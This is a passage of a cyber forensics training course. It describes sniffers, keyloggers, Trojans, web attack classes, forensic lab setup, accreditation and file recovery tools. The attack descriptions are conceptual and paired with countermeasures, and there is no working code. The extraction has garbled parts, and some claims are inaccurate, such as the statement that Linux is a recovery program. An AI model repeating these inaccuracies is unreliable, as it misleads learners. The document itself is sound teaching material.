Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Capture all data packets being sent across the network in the raw form. It is commonly used for: Traffic Monitoring, Network Trouble shooting, Gathering Information on Attacker. For stealing company Secrets and sensitive data. Commonly Available Sniffers, tcpdump, Ethereal, Dsniff.
Working Sniffers work along with the NIC, capturing all data packets in range of the compromised system.
Counter measures Switch to Switching Networks. Only the packets meant for that particular host reach the NIC. Use Encryption Standards like SSL, SSH, IPsec.
Key loggers Record all keystrokes made on that system. Store them in a log file. It can later automatically be emailed to the attacker.
Trojans Trojans act as a RAT or Remote Administration Tool, which allow remote control and remote access to the attacker.
Working The Server Part of the Trojan is installed on the target system through trickery or disguise. This server part listens on a predefined port for connections. The attacker connects to this Server Part using the Client part of the Trojan on the predefined port number. Once this is done, the attacker has to complete control over the target system.
Detection & Countermeasures Port Scan your own system regularly. If you find an irregular port open, on which you usually do not have a service running. Then your system might have a Trojan installed.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 84 of 135
4/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
One can remove a Trojan using any normal AntiVirus Software.
Live Example: Hacking NetBIOS NetBIOS (Network Basic Input/output System) was originally developed by IBM as an Application Programming Interface (API) for client software to access LAN resources. Since its creation its strictest sense, NetBIOS is an interface specification for accessing networking services.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 85 of 135
5/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Internet Application Security
WHID (Web Hacking Incident Database) annual report for 2007, 67% percent of the attacks in 2007 was "for profit" motivated. And it has targeted the WebApplications. Acunetix, a leading vendor of web application security solutions, revealed that on average 70% of websites are at serious and immediate risk of being hacked. Every 1500 lines of code has one security vulnerability.
Attacks on Web Application Mobile Application, Browser Application. Internet data is shared. 24 / 7
Hacking Methods A typical attacker works in the following manner. Identify the target system by gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace.
Fundamental Methodology Foot printing, Discovery of Web application, Profiling, Getting Real Attack Points, Exploit the system Finding the defend mechanism and approach for them.
Foot Printing IP Address and Port as start point for assessment MYTH What if IP address is multihosted? One IP can have more application to assess. Finding web application running on domain.
Analysis tool file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/15.html Page 86 of 135
1/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
The mission of this network forensic analysis tool is to store and then analyze. Host Foot printing. Domain Foot printing. Both focus on Web application. Tools and method.
WebApplication Attributes Query String Java script Cookie script Path to cgibin Others
Why Vulnerable? Poor Web Application coding Insecure deployment of web application Insufficient input validation No web traffic filtering Web application attributes are not guarded well For example Query String
Classes of Attacks Authentication: The Authentication section covers attacks that target a web site′s method of validating the identity of a user, service or application. Authorization: The Authorization section covers attacks that target a web site′s method of determining if a user, service, or application has the necessary permissions to perform a requested action. Clientside Attacks : The Clientside Attacks section focuses on the abuse or exploitation of a web site′s users. Command Execution : The Command Execution section covers attacks designed to execute remote commands on the web site. Logical Attacks : The Logical Attacks section focuses on the abuse or exploitation of a web application′s logic flow. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/15.html Page 87 of 135
2/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Brute force: A Brute Force attack is an automated process of trial and error used to guess a person′s username, password, creditcard number or cryptographic key. Crosssite Scripting: Crosssite Scripting (XSS) is an attack technique that forces a web site to echo attackersupplied executable code, which loads in a user′s browser. SQL Injection: SQL Injection is an attack technique. It is used to exploit web sites that construct SQL statements from usersupplied input. XPath Injection: XPath Injection is an attack technique used to exploit web sites that construct XPath queries from usersupplied input.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/15.html Page 88 of 135
3/3
UNIT - 6 Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards
Page 89 of 135
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Introduction to Digital Forensics Lab
Digital Forensics Lab process The process of constructing a new forensic laboratory revolves around four general activities. They are as follows ; planning, design, construction and moving
Planning Planning is a stage of activity in the Digital Forensics Lab process. Key to the planning stage is a Needs Assessment/Design Program.
Design Design is the second stage of activity in the Digital Forensics Lab process. It includes, Site access. Emergency and service access. Site lighting. Design is of two types. They are, Landscape design. Parking design.
Security Design Security Strategy Meeting. Escort only design. Door access systems. Door status monitoring. Closed circuit television (CCTV) systems. Special security design features.
Electrical Systems Design Checklist
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/2.html Page 90 of 135
1/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
The following are the Electrical systems design checklist. Emergency generator. Uninterruptable power supply (UPS).
General Laboratory Design The following are the key things of General Laboratory Design Bench top work surfaces. Biological hoods. Handsfree sinks. Evidence drying rooms. The types of rooms for Controlled Substance Section are as follows ; Instrumentation room. Evidence storage room. The types of rooms for Toxicology Section are as follows ; Robotics. Radioimmunoassay room. The types of rooms for Firearms/Tool marks Section are as follows ; Comparison microscopy room. Test fire range. Xray Diffraction (XRD) room. Scanning electron microscope room. The types of rooms for Forensic Biology/DNA Section are as follows ; Wet blood preparation room. Freezer storage room. Refrigerated storage room. Reagent preparation room. Electrophoresis room. Photo room. Mitochondrial DNA (mtDNA) room. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/2.html Page 91 of 135
2/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Research and development/methods development room. The types of rooms for Latent Prints Section are as follows ; Chemical processing room. Evidence storage room. Main Questioned Documents Laboratory Space. Administrative work spaces. Main computer evidence laboratory space. Dry firesuppression system.
Building The types of rooms for building Section are as follows ; Mechanical. Communications. Staff use. Other.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/2.html Page 92 of 135
3/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Forensic Computer Examiner
The Certified Forensic Computer Examiner (CFCE) credential was the first certification demonstrating competency in computer forensics in relation to Windows based computers. The CFCE training and certification is conducted by the International Association of Computer Investigative Specialists (IACIS). It is a nonprofit, all volunteer organization of current and former law enforcement members.
Digital Forensic Examiner Checklist The following question is a Digital Forensic Examiner Checklist. Does each examiner have a minimum of a high school diploma or equivalent education certification? Does each examiner have a minimum of eightyhours of digital forensic training? Is all formal training received from a person approved as an instructor in the discipline being taught? Are training syllabi or certification of completion maintained on file for each class attended? Does each examiner hold an industry recognized certification in digital forensics? Has each examiner successfully completed, at a minimum an annual or semiannual proficiency exam? Is each examiner knowledgeable in the use of the examination equipment, software, and the procedures used in conducting examinations? The following is a Digital Forensic technician Checklist Begin tracking the manhours you put into the media analysis and administrative work. Verify search authority, consent, warrant, and subpoena for exact legal level of analysis. Ensure what level of analysis and what files you can examine. i.e., Does the warrant cover email, unopened email, etc. Get a copy of this document and place it in your analysis case file. Pull up the master of the case documentation file and place it in the analysis case file. Create a modified boot disk for the forensic software (Encase). Ensure it is of the current version loaded on the forensic machine. Fill out all the necessary and place all initial case documentation in this file file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/3.html Page 93 of 135
1/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
So that you can keep track of important details from the start of the forensic exam.
Preparing a case file Ensure you have a search warrant or consent to search when you open a case file, And ask the submitting officer to fill out the "Official Request for Laboratory Examination." The most important part of this form is for the officer to fill out the keywords in the investigation that he wants you to search the computer for. The following is a part of Preparing a case file in the Digital Forensic technician Checklist Create a Report to Attach to the Media Analysis Worksheet Current date and time (include appropriate time zone) Significant problems/broken items Lapses in analysis Special techniques required or used above and beyond normal processes (e.g., password cracker) Create a Keyword List
Create a list of keywords The following are the part of Preparing a case file in the Digital Forensic technician Checklist. Create a list of keywords to be searched or get the list from the officer on the case. Place a copy of this in your analysis case file.
Create Findings and Analysis CDs Copy evidentiary files from your "save" subdirectory on the evidenceprocessing computer to a CDROM. Be certain to include the appropriate utilities on the CDROM for recreation of the original files by the end user (district attorney, investigator, defense). Be sure to make a spare copy of this evidentiary CD to place in evidence. Include in the final report the Encase report (keyword listing, logical file listings, search results, and a thorough listing of physical image files, free space, slack space, and deleted files, where appropriate).
Case Report Writing and Documentation The following question are the Digital Forensic Examiner Checklist Signed original "Computer Forensic file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/3.html Page 94 of 135
2/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Investigative Analysis Report" Keyword lists used Request for support
Notes of Importance Don′t make any assumptions. If you discover an email, don′t assume you know the recipient′s name from the email address alone. An email addressed to "Matt," whose email address is [email protected], does not necessarily mean that the recipient′s name is Matt Smith. Email addressed can be faked easily. Spell check is your friend. Don′t wait for a supervisor or district attorney to proofread your report! Spell check it before it leaves your machine.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/3.html Page 95 of 135
3/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Digital Forensic accreditation
The accreditation process focuses on the three essential elements of a digital forensic case, They are Computer Network Evidence Recovery and Analysis and Digital Evidence Analysis, Recovery & Preservation and Interpretation of the information in a forensic context. All three areas (including IEPE) will be assessed in specific digital/computer type courses. i.e. BSc (Hons) Digital Forensics, although it is possible to be accredited for only two of the standards, it is generally expected that accreditation will be against all three. This decision will be made by the CoChair of Standards (Accreditation) and the assessment team.
ACCREDITATION PROCESS Making Contact In the first instance, the university should make contact with the CoChair of the Standards Committee (Accreditation) . It is done by email to briefly discuss the course.
Pricing The university is required to prepare an outline of the courses that are being presented for scrutiny and the component standards that are to be assessed. This document will enable the Society to determine the resources that will be required for the assessment and provide a pricing statement. The Society needs to know how many courses are to be accredited, at what level (undergraduate or postgraduate) and the extent, if any, of overlap between those courses e.g. duplication of modules.
Preparing A Matrix The university will then be required to prepare an indepth matrix for each course showing how the component standards are met by the course material. The format of this is flexible, but typically consists of a Microsoft Excel document mapping the relevant module codes / titles to teach of the component standards and a copy of each of the module outlines/handbooks to allow for more detailed scrutiny.
Assessment Visit An assessment panel will scrutinize the documents. An assessment panel consisting of a chair (professor), one academic and one practitioner will scrutinize the documents, file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/4.html Page 96 of 135
1/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
To inform the University other Documentation and materials they may wish to consult and then visit the university to assess the resources available.
Result of Assessment The Chair of the Accreditation SubCommittee (ASC) will Endeavour to communicate the decision of the assessment panel to the university as soon as practical as and no later than 2 weeks after the next Society′s Accreditation SubCommittee meeting.
Annual Review It is an important stage in Accreditation process. The university courses that receive accreditation will be reviewed on an annual basis by an assessor.
Guide for Course Providers The service was developed to help establish and maintain standards of education in forensic science. It involves major employers and professional interests. It is the aim of the Society to assist HEIs in To achieving these standards by providing access to advice and guidance. Accreditation is based on a series of Component Standards. The Component Standards address specific areas of forensic practice. They are intended to augment, not replace, the underlying scientific knowledge of the forensic components. For example, the Laboratory Analysis module does not include basic laboratory procedures such as pH measurement, volumetric procedures, or weighing. The standards are therefore the beginnings of an expanded suite that will eventually cover the entire knowledge range within most of the forensic sciences.
Code for each component standard The following indicates the code for each component standard IEPE Interpretation, Evaluation & Presentation of Evidence CSI Crime Scene Investigation Lab Analysis Laboratory Analysis CNERA Computer Network Evidence Recovery and Analysis DEARP Digital Evidence Analysis, Recovery and Preservation file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/4.html Page 97 of 135
2/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Anth Forensic Anthropology Arch Forensic Archaeology
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/4.html Page 98 of 135
3/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Computer Forensic Laboratory Checklist Samples
Ensure your lab door locks and you have controlled access to the keys and/or Combination. Ensure your cleaning staff and others do not have access to the facility unless they are properly escorted. Ensure the walls and ceiling are constructed in such way that easy access is prevented.(E.g. Preventing someone from climbing over the wall and dropping through the ceiling). Ensure protective mechanisms are in place for disastrous events such as fire, flooding, lightning, and other events common to the environment Ensure there is a physically secure evidence room or locker within the lab with a separate key or combination lock than what′s used to get into the lab. Ensure there are written policies and procedures for lab controls, evidence controls, forensic examinations, and validation of tools and equipment. Ensure a formal case management system is in place. Ensure there is a separate network connection for Internet access that is separate from the forensic examination computer. Ensure the forensic examination computer is isolated from the network. Make certain there is a central place to store documents. It could be in the evidence room or locker if it′s large enough and fits your storage needs. Ensure there is a designated document librarian for centralized and consistent control of case data. Ensure there is a standard validated field kit including the hardware and software tools you use the most in your investigations. Ensure you have extra copies of forms, like Chain of Custody forms and Evidence Receipts. Ensure your hardware and storage are consistent with the environment you commonly investigate, including access to special equipment, extra drives and other needed media. Ensure you have hardware and/or software tools for: Write protection Acquisition Data recovery/discovery Internet history, Images, Email Password cracking file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/5.html Page 99 of 135
1/2
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Mobile devices Eg : PDA / cell phone Malware/virus detection Binary analysis Large storage analysis Multifunction use Eg. : EnCase, Paraben Tools, FTK, SMART
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/5.html Page 100 of 135
2/2
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
LABORATORY EXAMINATIONS
Any anticontamination precautions or requirements of the particular case. Eg : presence of narcotics, poisons, explosives, etc. It must be considered before any examination proceeds, and the minimum precautions necessary are identified and then implemented. All items submitted for forensic examination should first be examined for the integrity of their packaging. Any deficiency in the packaging which may compromise the value of a laboratory examination should be grounds for refusal to carry out the laboratory examination. All personnel involved in examinations of computer systems should take adequate precautions to minimize any risks from electrical hazards or static. Also some items need to be protected from Electro Static Discharge (ESD). Teams engaged upon the recovery of digital evidence should maintain a set of written procedures particular to their requirements. But within the broad framework of an accepted national or international standard. In the UK, Law Enforcement agencies can follow the principles documented in the ACPO Good Practice Guide for Computer based Evidence and procedures should be available describing how these principles are followed. The relevant local procedures manual should be specific, comprehensive and understood by all members of staff in that unit. To laboratory examinations we should search the following things. Case Records Analysis Protocols
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/6.html Page 101 of 135
1/1
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
HEALTH AND SAFETY in digital forensic
Health and safety considerations are extremely important. It is important in all of the work carried out at all stages of the forensic process. Personnel engaged in the examination of various forms of digital technology. It should operate in accordance with the regulations of the pertinent government, environmental, safety authorities and laboratory policy. General laboratory safety manuals available. It should be available to all laboratory personnel. These should contain details of how to conduct a risk assessment and how to develop safe systems of work, both at the scene of incident and in the laboratory. The risks identified, including working with large quantities of offensive material and the associated safe systems of work should be communicated to all personnel likely to be exposed to the risks. This is especially important when this group includes nonscientists or members of the public (e.g. in court). The relevant safe systems of work should be documented as an integral part of all standard operating procedures. Laboratory personnel should be responsible for maintaining their assigned work areas in a safe, clean and orderly manner. Appropriate safety equipment as outlined in the various procedures, It should be made available near the work sites by the laboratory management. It is the responsibility of the laboratory personnel to use them where required. All staff should be instructed on how to proceed in the event of fire, bomb threats, spillage of hazardous chemicals or electrical accidents, etc. All be required to practice these procedures once a year. All these practice of fire, bomb threats, spillage of hazardous chemicals or electrical accidents should be documented. A designated person should be trained and competent to render “qualified first aid” to those doing casework involving digital technology. It is very important thing.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/7.html Page 102 of 135
1/1
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Introduction to COMPLAINTS PROCEDURE
Complaints, possible miscarriages of justice and other anomalies need to be reviewed. It is to identify major issues and trends It is to be brought to the attention of senior management for action.
COMPLAINTS PROCEDURE The parent laboratory or organisation should investigate all complaints made by any providers of casework or others (e.g. courts) as well as any anomalies relating to the Services provided which are brought to its attention. Where appropriate the audit. Process will be used to assess the extent of any underlying problems. All customer complaints should be dealt with as quickly, efficiently and effectively as soon as possible. The process should aim to resolve misunderstandings and it will be correct errors, where possible. All complaints should be recorded and investigated either by local or senior management, as appropriate. Where necessary, corrective actions are taken to prevent recurrence of the problem. Any anomaly which could affect the validity of any results or materials supplied to customers will be dealt with promptly through an improvement and Corrective Action procedure. All members of staff are responsible for taking prompt action on any such anomaly which comes to their notice and ensuring that possible implications are reported. The appropriate level of management should ensure that corrective action includes advising customers, recalling reports or items and retesting or reissuing reports as appropriate. If such an anomaly is recognized specifically as a result of a proficiency test or Quality Assurance Trial, local procedures described in QMS should be followed with, wherever possible, a time limit applied for resolving the matter. Any possible miscarriage of justice brought to the attention of a laboratory either by an external body or by a member of staff, It must be immediately dealt with in accordance with local QMS procedures covering the Possible or Alleged Miscarriages of Justice.
REFERENCES The following are the references for health and safety procedures in digital forensic.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/8.html Page 103 of 135
1/2
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Interpol Computer Crime Manual – 19922001. ACPO Good Practice Guide for Computer based electronic evidence, Issue 5, 2008.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/8.html Page 104 of 135
2/2
UNIT - 7 Acquiring Data, Duplicating Data, and Recovering Deleted files
Page 105 of 135
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Digital forensics
Digital forensics is a branch of forensic science sometimes it is known as digital forensic science. It encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
Digital forensics software The following are the digital forensics software Forensic Toolkit Mobile Phone Examiner plus MPE+ AD Lab AD Enterprise Silent Runner Mobile Digital Decryption AD Triage Live Response Overcome case backlog with distributed processing and largescale, realtime collaboration. Built on FTK® technology, AD Enterprise allows you to investigate thousands of computers simultaneously from a remote location. With deepdive analysis of both volatile /memory and static data, as well as batch remediation, it’s a valuable incident response and enterprise investigations solution. Silent Runner network forensics software operates like a surveillance camera on your network. Monitor, capture and replay network communications for investigations and incident response. Locked out? Get back in. Password Recovery Toolkit® and Distributed Network Attack® are relied on by Fortune 500 corporations, law enforcement and government agencies to recover passwords from more than 100 applications. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/2.html Page 106 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Our decryption software is The Key to Cracking It®. AD Triage is a portable solution. It allows onscene forensic acquisition of volatile and static data. It can be used on both live and shut down computers, It is the ideal solution for field examiners, First responders and even nontechnical personnel. Live Response is a USB key. It enables first responders, investigators and IT security professionals. Used to collect the live volatile data, which will be lost once the computer system is shut down.
Investigation Tools The following are the Digital Forensic Investigation Tools for System Admins SANS SIFT Pro Discover Basic Volatility The Sleuth Kit (+Autopsy) FTK Imager Linux ‘dd’ CAINE Oxygen Forensic Suite2013 Standard Free Hex Editor Neo Bulk Extractor DEFT Xplico Last Activity View Digital Forensic Framework Mandiant Red Line Plain Sight HxD HELIX3 Free file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/2.html Page 107 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Net Sleuth P2 explorer Free
Digital Forensics Framework The abbreviation of Digital Forensics Framework is DFF. DFF is a free and Open Source computer forensics software. It built on top of a dedicated Application Programming Interface (API).
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/2.html Page 108 of 135
3/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Data
Data are manipulated either as values or variables by encoding them into information. Data which are derived through reason or which are employed in the course of behaving, are collectively called knowledge. Data are typically the results of measurements, It can be visualized as graphs or images.
Datum Datum means "an item given". In cartography, geography, nuclear magnetic resonance and technical drawing. It often refers to a reference datum where from distances to all other data are measured.
Meaning of data Data are extracted from information, The knowledge is derived from data. Data are the collections of information. Through information we acquiring knowledge.
Data vs Information Beynon Davies uses the concept of a sign to distinguish between data and information; data are symbols while information occurs when the symbols are used to refer to something.
Recover lost or deleted files To recover the lost or deleted files from the best free undelete software. Some of the best free undelete software as follows ; Recuva Free Undelete 360 To recover the lost or deleted files from the best free undelete software. Some of the best free undelete software as follows ; MiniTool Partition Recovery Wise Data Recovery
Recuva Free file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 109 of 135
1/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Conveniently available in a portable version, Recuva Freeis very easy to use. A wizard asks you what type of files you′re looking for, and where to search, then scans your system at speed (FAT, exFAT and NTFS file systems are supported). Any files found are listed (with previews for images), and you can restore anything you need in a couple of clicks.
Undelete 360 Undelete 360 is the free version of a commercial product, and so leaves out some useful features (file filtering, previews and so on). These still appear in the interface, though, and suggest you upgrade if you ever click on them, which can be annoying. There are no restrictions on the amount or size of the files you can recover, though, and otherwise the program is very simple to use: point it at a drive, it′ll scan for deleted files, then you can view particular file types (JPGs, PDFs, videos and more) by choosing them from a tree. Scanning speed isn′t great, but Undelete 360 can recover files that other programs miss , and so it′s definitely worth considering.
Mini Tool Partition Recovery Standard undelete programs are perfect for recovering a few files, but if you′ve lost an entire partition then you′ll probably benefit from a specialist application like MiniTool Partition Recovery. The free (for personal use) program has a wizardbased interface. It makes it very straightforward to use. Point Mini Tool Partition Recovery at the problem drive, specify the area to be searched, and it′ll scan for the missing partition. A report will let you know what the program has found, and you can recover the partition in a few seconds. You don′t get a bootable recovery disc here, so if your system partition is damaged then Mini Tool Partition Recovery won′t help you very much. Otherwise, though, it provides a quick and easy way to locate and restore lost partitions.
Wise Data Recovery It′s hard to imagine how any undelete tool could be simpler than Wise Data Recovery. There are no menus, no complicated options or dialog boxes: all you do is choose a drive, click Scan, and wait as the program locates any deleted files. Select what you need, click Recover, and that′s just about it.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 110 of 135
2/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Wise Data Recovery doesn′t seem to work with FATbased drives, though, recovering nothing from our test USB drive. It′s only free for personal use, too. But if you just need something quick and easy to recover files from NTFS drives then it should probably be on your shortlist.
How to Restore Deleted Partition? There is three steps To restore the deleted partition. Step 1: Scan Hard Disk for deleted partitions In this step first scan the hard disk for deleted partitions. There is three steps To restore the deleted partition. Step 2: Select partition and open "Restore Partition" dialog In this step select the partition and then Restore partition dialog. There is three steps To restore the deleted partition. Step 3: Set restore options in "Restore Partition" dialog and run restore. In this step set the restore options in Restore partition dialog. Then run restore. Stellar Phoenix Partition Recovery : Professional partition recovery software that works impressively stellar to accomplish the process of recovering lost, deleted, or inaccessible data on Windows based drives and removable media. Key Features of Stellar Phoenix Partition Recovery : The key features of stellar phoenix partition recovery are as follows ; Recovers missioncritical files from Windows hard drive and supported external media ′Raw Recovery′ feature to flawlessly recover files from severely corrupt media Recovers deleted emails in MS Outlook and Outlook Express Recovers files from damaged or corrupt optical media Support for broad range of files types, including documents, photos, and multimedia files Salient features of this Windows recovery tool : Some salient features of this Windows recovery tool are as follows ; Drive Recovery Lost Partition Recovery Raw Recovery Optical Media Recovery PreRecovery Preview of Files Advance Tools : The following are the some Advance Tools
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 111 of 135
3/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
System Startup Disc SMART Image Your Hard Disk
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 112 of 135
4/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Data Recovery software
Linux is a Data Recovery software. It helps you recover lost or inaccessible data. It is recovered from any Ext4, Ext3, Ext2, FAT32, FAT16, and FAT12 file system based LINUX volumes. Recovers all your lost files, directories, and hard drive volumes. Recovers from all available hard drive types, including SCSI, SATA, EIDE, and IDE. Userfriendly interface; no technical expertise required.
Free Utilities S.M.A.R.T. : Feature that monitors health status of hard drive and issues warning messages intelligently. Drive Imaging : Imaging of the entire hard drive, volumes or any selected region. Hard drive cloning :– Makes an exact replica of the hard drive.
Features of Linux Linux Deleted File Recovery Quick Recovery Advance Recovery Lost or Deleted Volume Recovery Allows Scanning for Specific File Types Mask to Narrow Scan Result Provides Preview of Recoverable Files Find Required Files and Perform Selective Recovery Resume Recovery from Saved Image or Scan Information Saves Recovered Files to any Location Allows Compressing Recovered Files Disk Imaging Drive Cloning SMART file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/4.html Page 113 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Deleted File Recovery Stellar Linux recovery software efficiently recovers all your accidentally/intentionally deleted documents, photos, audios, videos, and other multimedia files. In case of recovering deleted files from FAT file system based volumes, the software provides two different scanning methods – ‘Quick Scan’ and ‘Deep Scan’. Deep Scan takes relatively more time, but yields better chance of file recovery.
Quick Recovery With the ′Quick Recovery′ option of the software, you can recover lost data by scanning any volume or previously saved image of the volume. The recovery method is significantly fast and efficient enough to recover almost all your data back.
Advance Recovery The ′Advance Recovery′ option of the software helps recovering all your lost, deleted, or inaccessible data. It is done by performing extensive search operation on the selected volume or its image file. This recovery option is comparatively slower than Quick Recovery, but ensures more chance of recovering lost files.
Deleted Volume Recovery This data recovery Linux software provides an innovative option to search and list all lost/deleted volumes in the system. The software finds all ext4, ext3, ext2, FAT file system based volumes, which have been completely deleted from the hard drive and allows recovering data from them using Quick Recovery, Advance Recovery, or Deleted File Recovery method.
Scanning for Specific File Types The software allows you to scan only for the selected file types. Apart from this, the software provides options to add new files to the list, edit an existing file type, and remove file types from the list.
Narrow Scan Result The ′Mask′ option of the software helps you narrow down the entire scan result. Once the scanning process gets completed, you can apply mask on the scan list to create a new tree, containing only your required file types. The software provides several masking options, including ′File of type′, ′Size from′ (KB), and file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/4.html Page 114 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Date.
Preview of Recoverable Files After completion of the scanning operation, this data recovery Linux software ensures recovery chances of files by showing the preview of all recoverable files in the selected volume. You can click a file from the scanned list and preview the same in the upper pane of the interface.
Find Required Files With the ′Find′ option in Stellar Linux recovery, you can locate the required files and help performing selective recovery. This option further gives several suboptions to search only your needed files from the huge pool of scanned file list and recover them smoothly.
Resume Recovery from Saved image The software allows you to save the scan information and resume the recovery operation, any time in future. This wonderful utility provides options to resume the recovery process from any previously saved scan information or image file of the drive.
Saves Recovered Files Stellar Phoenix Linux Data Recovery allows you to save the recovered files to any storage media connected to the system. You can save the recovered data onto your local disk or any File Transfer Protocol (FTP) server.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/4.html Page 115 of 135
3/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Recycle Bin
The Recycle Bin is a location. Recyle bin is like a folder Where deleted files are temporarily stored. It can found in PC. It can also found in laptops. The Recycling Bin allows users to recover files that have been deleted in Windows. By default, Microsoft Windows 95 and above uses 10% of available disk space to save any deleted files in case any file is accidentally deleted it can be recovered from the Recycle Bin.
View deleted files in Recycle Bin If any file has been deleted in Windows, it is automatically moved to the Recycle Bin. Users can identify if files are in the Recycle Bin by looking at the Recycle Bin icon. By default, the icon will look like the icon to the right, an empty Recycle Bin. When files have been deleted, the Recycle Bin will be full of trash. If the Recycle Bin is full, users can view the files in the Recycle Bin by doubleclicking the Recycle Bin icon.
